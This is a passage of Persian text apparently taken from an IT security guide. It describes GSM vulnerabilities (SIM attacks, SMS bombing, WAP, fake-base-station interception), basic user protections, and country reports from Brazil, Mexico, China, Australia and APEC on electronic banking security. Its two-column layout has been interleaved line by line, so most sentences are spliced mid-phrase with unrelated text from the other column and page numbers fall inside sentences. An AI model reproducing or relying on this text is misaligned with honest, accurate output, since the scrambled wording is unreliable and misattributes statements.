ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ GSMﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻛـﺎﺭﺕ ،SIM ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺍﺯ ﺍﻭﻟﻮﻳﺖ ﺑـﺎﻻﻳﻲ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﺩﻭﻟـﺖ
ﺑﻤﺒﺎﺭﺍﻥ ،SMSﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ،WAPﻭ ﻧﻴﺰ ﺣﻤﻠﻪﺍﻱ ﻛﻪ ﺑـﺎ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ .ﺗﻌﺮﻳﻒ ﻭ ﮔﺴﺘﺮﺓ ﻋﻤﻠﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳـﺪ ﺷـﺎﻣﻞ
٢٣٦ ﻲ ﺗﻬﺪﻳــﺪﺍﺕ
ﺍﻧــﻮﺍﻉ ﻣﺨــﺎﻃﺮﺍﺕ ﺳــﺎﻳﺒﺮ ﺑﻌــﻼﻭﺓ ﺍﹶﺷــﻜﺎﻝ ﺳــﻨﺘ ﹺ
ﻧﺎﻡ " "man in the middleﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ.
ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﻓﻴﺰﻳﻜﻲ ﻧﻴﺰ ﺑﺎﺷﺪ.
ﺍﮔﺮﭼﻪ ﺍﻳﻤﻦﺳﺎﺯﻱ ﻛﺎﻣﻞ ﻓﻨﺎﻭﺭﻱ GSMﻣﻤﻜـﻦ ﻧﻴـﺴﺖ ،ﺍﻣـﺎ
ﻛﺎﺭﺑﺮ ﺑﺎ ﭼﻨﺪ ﮔﺎﻡ ﺳﺎﺩﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ
ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ
ﺑﻌﻤﻞ ﺁﻭﺭﺩ:
ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ
ﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺭﻣﺰ ﻋﺒﻮ ﹺﺭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ؛ •
ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ؛ • ﺩﺭ ﺣﺎﻟﻲ ﻛﻪ ﺑﺨﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣـﺮﺯ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎ ﻭ
ﻧﺼﺐ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺷﺨﺼﻲ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ؛ • ﺍﺳﺘﻌﺪﺍﺩﻫﺎﻱ ﻣﺤﻠﻲ ﺭﺷﺪ ﻣﻲﻛﻨﺪ ،ﺭﺟﻮﻉ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ﺑـﺮﺍﻱ
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻪ ﻳﻚ ﻛﺎﺭ ﺭﺍﻳﺞ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻭ ﺧﺼﻮﺻﹰﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﺍﺯ ﻣﻨﺎﺑﻊ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ،ﻫـﻢ ﺗﻬﺪﻳـﺪﻫﺎ ﻭ ﻫـﻢ
۲۳۶ﺩﺭ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻳﻚ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ
ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺗﻠﻔﻨﻬﺎﻱ ﻫﻤـﺮﺍﻩ ﻣﻌﺮﻓـﻲ ﻣـﻲﻛﻨـﺪ ﻭ ﻓﺮﺻﺘﻬﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﺳﺖ.
ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ ﻣﻬـﺎﺟﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﺪﺯﺩﺩ .ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺟﻬـﺖ ﻛـﺎﻫﺶ ﺗﻬﺪﻳـﺪ ﻫـﺎﻱ
ﻼ ﺧﺎﻟﺺ ﻭ ﺑﺪﻭﻥ ﻫﺮﮔﻮﻧﻪ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻫـﺴﺘﻨﺪ ،ﻭ gatewayﻫﺎ ﻛﺎﻣ ﹰ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺗﻮﻓﻴﻖ ﺍﺟﺒﺎﺭﻱ ﺑﺮﺍﻱ
ﺍﻳﻦ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺑﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﺰﺭﮔﻲ
ﺭﻭﺑﺮﻭ ﺑﺎﺷﻨﺪ. ﺑﺎﻧﻜﻬﺎ ﺩﺍﻧﺴﺖ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨـﺪ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ﻭﺍﻛﻨـﺸﻲ
٢٢٣ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺩﺍﺩﻩ ﺷﻮﺩ ،ﭼﺮﺍﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﺣـﻮﺯﻩ ﻣـﺴﺪﻭﺩ ﻛـﺮﺩﻥ ﻓﺮﺁﻳﻨﺪﻫﺎﻳﻲ ﺟﻬﺖ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺍﻃﻼﻋــﺎﺕ ﺗﻨﻬــﺎ ﻣــﺸﻜﻼﺕ ﺭﺍ ﺣــﺎﺩﺗﺮ ﻣــﻲﻛﻨــﺪ .ﺑﺨــﺼﻮﺹ، ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ ﻭ ﭼﻪ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺭﺍ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﻧﻈﺎﺭﺕ ﺧﻮﺩ
ﻣــﺸﻜﻼﺕ ﺷــﮕﺮﻓﻲ ﺩﺭ ﺭﺍﺑﻄــﻪ ﺑــﺎ ﻃﺒﻴﻌــﺖ ﻓﺮﺍﺑﺨــﺸﻲ ﺟــﺮﺍﺋﻢ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻧﺪ؟
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ،ﺍﺯ ﺟﻤﻠﻪ ﻧﻔﻮﺫﻫﺎﻱ ﺳﺎﻳﺒﺮ ﻭ ﺩﺳﺘﻜﺎﺭﻱ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻣﺆﺳﺴﺎﺕ ﭼﻨﺪﺟﺎﻧﺒﻪ ﻭ ﭼﻨﺪﻣﻠﻴﺘﻲ ﭼﻄـﻮﺭ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺑـﺎ .۳
ﺑﺎﻧﻜﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﻜﺎﺭﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻫﻤﻜﺎﺭﻱ ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻛﻨﻨﺪ؟
ﻻﺯﻡ ﺍﺳﺖ.
ﺑﺮﺯﻳﻞ
ﻣﻜﺰﻳﻚ
ﻧﻤﺎﻳﻨﺪﺓ ﺑﺮﺯﻳﻞ ﺧﺎﻃﺮﻧﺸﺎﻥ ﻛﺮﺩ ﻛﻪ ﺭﻗﺎﺑﺖ ،ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑﻪ ﺳﺎﺧﺖ
ﺩﺭ ﭘﺎﺳــﺦ ﺑــﻪ ﻧﮕﺮﺷــﻬﺎﻱ ﻣﻤﻜــﻦ ﺩﺭ ﺭﺧــﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴــﺖ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﻪ ﻫﺪﺍﻳﺖ ﻣﻲﻛﻨﺪ ،ﺍﻣﺎ ﺍﻳـﻦ ﻓﻨﺎﻭﺭﻳﻬـﺎ ﻣـﺴﺘﻌﺪ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻣﻜﺰﻳــﻚ ﺍﺷــﺎﺭﻩ ﻛــﺮﺩ ﻛــﻪ ﺍﻣﻜــﺎﻥ ﺩﺳﺘﺮﺳــﻲ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻫﺴﺘﻨﺪ .ﻣﻴﺎﻥ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺧـﺪﻣﺎﺕ ﺍﺯ ﻳـﻚ ﺳـﻮ ﻭ
ﺑﻪﺷﻤﺎﺭﻩﻫﺎﻱ PINﺍﺯ ﻃﺮﻳﻖ ﻭﺏ ﺭﻭ ﺑﻪ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ ﻭ ﺍﻳـﻦ ﻛﻼﻫﺒﺮﺩﺍﺭﻳﻬﺎ ﺍﺯ ﺳﻮﻱ ﺩﻳﮕﺮ ،ﻳﻚ ﺗـﻮﺍﺯﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﻛـﺎﺭﺁﻳﻲ
ﻣﺴﺌﻠﻪ ﺟﺪﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﻲﻛﻨﺪ .ﺩﺭ ﻫﺮ ﺻـﻮﺭﺕ ﺁﻧﻬـﺎ ﻓﻨﻮﻥ ﺑﺮﮔـﺰﺍﺭﻱ ﺁﺯﻣـﻮﻥ ﺑـﺮﺍﻱ ﺩﻭﺭﻩﻫـﺎﻱ ﺁﻣﻮﺯﺷـﻲ ﺩﺭ ﺑﺮﺯﻳـﻞ
ﺗﻼﺷﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﻛﻨﻨﺪ، ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ.
ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻇﺮﻓﻴﺘﻬﺎﻱ ﻛﻨﺘﺮﻟـﻲ ﻗـﻮﻱ ﺩﺍﺭﻧـﺪ ﻭ ﺷـﺮﻛﺘﻬﺎﻱ
ﺩﺭ ﭘﺎﺳــﺦ ﺑــﻪ ﺍﻳــﻦ ﺳــﺆﺍﻝ ﻛــﻪ ﻣﺆﺳــﺴﺎﺕ ﭼﻨــﺪﻣﻠﻴﺘﻲ ﭼﮕﻮﻧـﻪ
ﺍﻣﻨﻴﺘ ـﻲ ﻭ ﻧﻈــﺎﺭﺗﻲ ﺑــﺴﻴﺎﺭﻱ ﻫــﺴﺘﻨﺪ ﻛــﻪ ﺩﺭ ﺯﻣﻴﻨــﺔ ﻓﻨــﺎﻭﺭﻱ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻛﺸﻮﺭﻫﺎ ﻛﻤﻚ ﻛﻨﻨﺪ ،ﺑﺮﺯﻳﻠﻲ ﻫﺎ ﻣﺎﻳﻞ ﺑﻮﺩﻧﺪ ﻛﻪ ﺩﺭ
ﺍﻃﻼﻋﺎﺕ ﺗﺨﺼﺺ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺑﻌﻼﻭﻩ ﻣﻜﺰﻳﻚ ﺗﻮﺻـﻴﻪﻫـﺎﻱ
ﺯﻣﻴﻨﻪﻫﺎﻱ ﺯﻳﺮ ﺑﻪ ﺁﻧﻬـﺎ ﻛﻤـﻚ ﺷـﻮﺩ :ﺑﺮﮔـﺰﺍﺭﻱ ﺁﺯﻣـﻮﻥ ﺑـﺮﺍﻱ
BASELﺭﺍ ﺑﺮﺍﻱ ﻛﻨﺘـﺮﻝ ﻣﺨـﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﻟﺤـﺎﻅ ﻛـﺮﺩﻩ
ﺩﻭﺭﻩﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ ،ﺗﺪﻭﻳﻦ ﺭﺍﻫﻜﺎﺭﻫﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ،ﻭ
ﺍﺳﺖ.
ﻧﻴﺰ ﺍﻳﺠﺎﺩ ﻣﺪﻟﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺑﺎ ﺣﺪﺍﻗﻞ ﻗﻮﺍﻧﻴﻦ ﺑﺎﻧﻜﻲ.
ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺳﺆﺍﻝ ﺳﻮﻡ ،ﻣﻜﺰﻳﻜﻲﻫﺎ ﺑﺮﺍﻱ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻦ
ﺗﺠﺮﺑﻴﺎﺕ ،ﺍﺭﺯﻳﺎﺑﻲﻫﺎ ﻭ ﻧﻴﺎﺯﻫﺎ ﭘﻴﺸﻨﻬﺎﺩ ﻛﺮﺩﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺟﻬـﺎﻧﻲ ﭘﺮﺳﺶ
ﻣﻴﺎﻥ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻣﺒﺎﺩﻟﻪ ﺷﻮﺩ. ﺑﺮﺯﻳﻠﻲﻫﺎ ﭘﺮﺳﻴﺪﻧﺪ ﻛﻪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻃﺒﻴﻌﺖ ﭘﻮﻳﺎ ﻭ ﭘﻴﺸﺮﻓﺖ ﺳﺮﻳﻊ
ﻓﻨﺎﻭﺭﻱ ﻛﻪ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﺭﺍ ﻣﺸﻜﻞ ﺳـﺎﺧﺘﻪ ،ﭼﮕﻮﻧـﻪ ﻣـﻲ ﺗـﻮﺍﻥ
ﺯﻳﺮﺳﺎﺧﺖ ﻗﺎﻧﻮﻧﻲ ﺑﺮﺧﻮﺭﺩ ﺑﺎ ﺟﺮﺍﺋﻢ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﺮﺩ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٢٤
APECﺑﻪ ﻓﻨـﺎﻭﺭﻱ ﺑـﻲﺳـﻴﻢ ﻧﻴـﺰ ﺧﻮﺍﻫـﺪ ﭘﺮﺩﺍﺧـﺖ ﻭ ﺑﻄـﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺩﺍﺧﻠﻲ ﻭ ﮔـﺰﺍﺭﺵ ﺑـﻮﺩ .ﺑﻌﻨـﻮﺍﻥ
ﺧﻼﺻﻪ ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﭼﻮﻥ Wi-Fiﻫﻢ ﻣﻲﭘﺮﺩﺍﺯﺩ. ﻧﻤﻮﻧﻪ ،ﮔﺰﺍﺭﺵ ﺭﻭﻳﺪﺍﺩ ﻫﺎ ﺗﻮﺳﻂ ﻣﺄﻣﻮﺭﺍﻥ ﺑـﺎﻧﻜﻲ ﺑـﺮﺍﻱ ﺍﻳﻤﻨـﻲ
ﺑﺎﻧﻚ ﺿﺮﻭﺭﻱ ﺍﺳﺖ .ﺑﺮﺍﻱ ﻛﻤﻚ ﺑـﻪ ﻇﺮﻓﻴﺘﻬـﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ
ﺳﻮﻡ ،ﺗﺎ ﺁﺧﺮ ﺍﻛﺘﺒﺮ ۲۰۰۳ﺩﺭ ﺗﻤـﺎﻡ ﻛـﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ APEC
ﺭﺧﺪﺍﺩﻫﺎ ،ﻳﻚ ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬـﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺭ ﺍﻭﻛـﺮﺍﻳﻦ
ﻣﺮﺍﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺗﺸﻜﻴﻞ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ.
ﭼﻴﻦ ،ﭘﻜﻦ
ﭘﺎﺳﺦ
ﻧﻤﺎﻳﻨﺪﺓ ﭼﻴﻦ ﺑﻴـﺎﻥ ﺩﺍﺷـﺖ ﻛـﻪ ﺁﮔـﺎﻫﻲ ﻋﻤـﻮﻣﻲ ﺩﺭﺧـﺼﻮﺹ ﺩﺭ ﻣﻮﺭﺩ ﻣﺪﺍﺭﻙ ﻣﺤﻜﻤﻪﭘﺴﻨﺪ ،ﺑﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ
ﺟﺎﻳﮕﺎﻩ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ ﻭ ﺑﺮﺍﻱ ﻧﻴﻞ ﺑﻪ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﻣﻌﺮﺽ ﻧـﺎﺑﻮﺩﻱ ﺳـﺮﻳﻊ ﻫـﺴﺘﻨﺪ ﻭ ﺩﺭ
ﻣﻘﺼﻮﺩ ﺍﺭﺯﻳﺎﺑﻴﻬﺎﻱ ﺧﺎﺭﺟﻲ ﺑﻴﺸﺘﺮﻱ ﻣﻮﺭﺩ ﻧﻴـﺎﺯ ﺍﺳـﺖ .ﻳﻜـﻲ ﺍﺯ ﺣﻮﺯﺓ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﻫﻴﭻ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﻣﺪﺍﺭﻙ ﻗﺎﻧﻮﻧﻲ
ﻋﻤﺪﺓ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﭼﻴﻦ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺎ ﺁﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﺑﺎ ﺍﻳﻨﻜﻪ ﺩﻧﻴﺎ ﻧﻴﺎﺯﻣﻨﺪ ﺭﺍﻫﺒﺮﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﭘﻴﮕﺮﺩﻫـﺎﻱ
ﻣﻮﺍﺟﻪ ﻣﻲﺑﺎﺷﺪ ﻓﻘﺪﺍﻥ ﺁﮔﺎﻫﻲ ﻭ ﺗﻮﺍﻧﺎﻳﻲ ﻣﺪﻳﺮﻳﺘﻲ ﺑﺮﺍﻱ ﺍﺭﺯﻳـﺎﺑﻲ ﻗــﺎﻧﻮﻧﻲ ﺑــﺼﻮﺭﺕ ﺩﻳﺠﻴﺘــﺎﻝ ﺍﺳــﺖ ،ﺍﻣــﺎ ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ ﺭﻭﺵ
ﻣﺨﺎﻃﺮﺍﺕ )ﺑﺨﺼﻮﺹ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﺎﻫﻴﺖ ﭘﻴﭽﻴﺪﺓ ﻓﻨﺎﻭﺭﻳﻬﺎ( ﺍﺳﺖ .ﺍﻳـﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﻛﻪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﺩﺍﺩﮔﺎﻫﻬﺎ ﺑﺎﺷﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﻣﺸﻜﻞ ﺩﺭ ﻛﺸﻮﺭ ﭼﻴﻦ ﺑﺪﻟﻴﻞ ﻫﻤﻜـﺎﺭﻱ ﺿـﻌﻴﻒ ﻣﻴـﺎﻥ ﻣﺮﺍﻛـﺰ
ﺑﺨﺶ ﺳﻮﻡ
ﻋﻠﻴﺮﻏﻢ ﺍﻭﺿﺎﻉ ﻧﺎﻣﺴﺎﻋﺪ ﺍﻣﻨﻴﺘـﻲ ،ﺑﺎﻧﻜﻬـﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺩﺭ ﭼـﻴﻦ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺟﻬﺖ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺍﻃﻼﻋﺎﺕ BASEL2 ،ﺭﺍ ﺍﻧﺘﺨـﺎﺏ ﻭ
ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﺷـﺪ ﻫـﺴﺘﻨﺪ .ﺗﻌـﺪﺍﺩ ﺍﻳـﻦ ﺑﺎﻧﻜﻬـﺎ ﺩﺭ ﺧـﻼﻝ ﭘﻴﺎﺩﻩ ﺳﺎﺯﻱ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺁﻧﻬﺎ ﺩﺭﻳﺎﻓﺘﻪﺍﻧﺪ ﻛـﻪ ﺍﺳـﺘﻔﺎﺩﺓ
ﺭﻭﺯﺍﻓﺰﻭﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺑـﺎ ﺍﻳﻨﻬﻤـﻪ ﺗﺸﺨﻴـﺼﻬﺎﻱ
ﺳﺎﻟﻬﺎﻱ ۱۹۹۹ﺗﺎ ۲۰۰۳ﺍﺯ ﻳﻚ ﺑﻪ ﺑﻴﺴﺖ ﻭ ﻫﻔﺖ ﺭﺳﻴﺪﻩ ﻭ ﻧﻴﺰ
ﻣﺜﺒﺖ ﻧﺎﺻﺤﻴﺢ ) (false positiveﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺗﻨﻈـﻴﻢﻧـﺸﺪﻩ
ﺣﺠﻢ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺑﻴﺶ ﺍﺯ ۱۰۰ﺑﺮﺍﺑﺮ ﺭﺷﺪ ﺩﺍﺷﺘﻪ ﺍﺳﺖ .ﺑﻪ
ﭼﻨﺪﺍﻥ ﺁﺳﺎﻥ ﻧﻴﺴﺖ .ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﻓﻨﺎﻭﺭﻳﻬـﺎﻱ
ﺍﻳﻦ ﻧﻜﺘﻪ ﺍﺷـﺎﺭﻩ ﺷـﺪ ﻛـﻪ ﺩﺭ ﺯﻣـﺎﻥ ﺷـﻴﻮﻉ ﺑﻴﻤـﺎﺭﻱ ﺳـﺎﺭﺱ،
ﭘﻴﺸﻴﻦ ﺳﺎﺧﺘﻪ ﻣـﻲ ﺷـﻮﻧﺪ ،ﻭ ﺍﻳـﻦ ﺑـﻪ ﭘﻴﭽﻴـﺪﮔﻲ ﻭ ﻭﺍﺑـﺴﺘﮕﻲ
ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﻭﻧﻖ ﺯﻳﺎﺩﻱ ﭘﻴﺪﺍ ﻛﺮﺩ .ﻧﻬﺎﻳﺘـﹰﺎ ﻛـﺸﻮﺭ ﭼـﻴﻦ
ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﺩﺍﻣﻦ ﻣﻲ ﺯﻧﺪ .ﺩﺭ ﻫﻤﻴﻨﺤﺎﻝ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﭘﻴﺸﻨﻬﺎﺩﻫﺎﻱ ﺯﻳﺮ ﺭﺍ ﺍﺭﺍﺋﻪ ﺩﺍﺩ:
ﻧﺤﻮﺓ ﻛﺎﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻧﻴﺰ ﺑﻪ ﺧﻮﺑﻲ ﻣـﺴﺘﻨﺪ ﺳـﺎﺯﻱ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ.
ﺗﺸﻮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﻄﻮﺡ ﻣﻠﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ .۱ ﻲ ﻭﺍﺑـﺴﺘﮕﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑـﻪ ﻳﻜـﺪﻳﮕﺮ ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﭼﮕﻮﻧﮕ ﹺ
ﺍﻳﺠﺎﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ .۲ ﻻ ﻣـﺴﺘﻨﺪﺍﺕ ﺩﺭ ﺩﺳـﺘﺮﺱ ،ﺑـﺴﻴﺎﺭ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﻣﻌﻤﻮ ﹰ
ﺍﻓﺰﺍﻳﺶ ﺷﻔﺎﻓﻴﺖ ﺩﺭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ .۳ ﻣﺤﺪﻭﺩ ﻫﺴﺘﻨﺪ .ﻧﻤﺎﻳﻨﺪﺓ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﺩﺭ
ﺍﻳﻦ ﻛﺸﻮﺭ ﻣﻄﺎﻟﺐ ﺁﻣﻮﺯﺷﻲ ﺭﺍﻳﮕﺎﻥ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻱ ﻋﻤـﻮﻣﻲ ﻭ
ﭼﻴﻦ ،ﻫﻨﮓﻛﻨﮓ ﺗﺨﺼﺼﻲ ﺑﺮﺍﻱ downloadﻛﺮﺩﻥ ﻓﺮﺍﻫﻢ ﺍﺳﺖ.
